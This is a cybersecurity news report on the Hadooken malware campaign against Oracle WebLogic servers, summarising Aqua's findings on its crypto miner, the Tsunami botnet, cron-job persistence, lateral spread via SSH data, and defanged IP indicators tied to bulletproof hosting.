Cybersecurity researchers have identified a new malware campaign targeting Linux systems to carry out unauthorized cryptocurrency mining and deliver botnet malware.
The campaign, which specifically targets Oracle WebLogic servers, delivers a malware strain known as Hadooken, according to cloud security firm Aqua.
“When Hadooken is executed, it drops Tsunami malware and initiates a crypto miner,” explained security researcher Assaf Moran.
The attack exploits known vulnerabilities and misconfigurations, such as weak credentials, to gain an initial foothold and execute arbitrary code on vulnerable instances.
Two nearly identical payloads—one in Python and the other as a shell script—are used to retrieve the Hadooken malware from remote servers (“89.185.85[.]102” or “185.174.136[.]204“).
Additionally, the shell script variant scans various directories containing SSH data (like user credentials, host details, and secrets) to attack known servers, Morag added.
“It then moves laterally across the organization or connected systems, further propagating the Hadooken malware.”
Hadooken contains two key components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet known as Tsunami (also referred to as Kaiten), which has previously targeted Jenkins and WebLogic services running in Kubernetes clusters.
The malware also establishes persistence on the host by setting up cron jobs to periodically trigger the crypto miner at different intervals.
According to Aqua, the IP address 89.185.85[.]102, registered in Germany under the hosting provider Aeza International LTD (AS210644), has been linked to an 8220 Gang cryptocurrency campaign, previously reported by Uptycs in February 2024. This campaign exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center.
The second IP address, 185.174.136[.]204, while currently inactive, is also connected to Aeza Group Ltd. (AS216246). Reports from Qurium and EU DisinfoLab in July 2024 revealed that Aeza is a bulletproof hosting service with operations in Moscow M9 and two data centers in Frankfurt.
“Aeza’s rapid growth can be attributed to its recruitment of young developers associated with Russian bulletproof hosting providers, offering a safe haven for cybercrime activities,” the researchers concluded.
Source: TheHackerNews
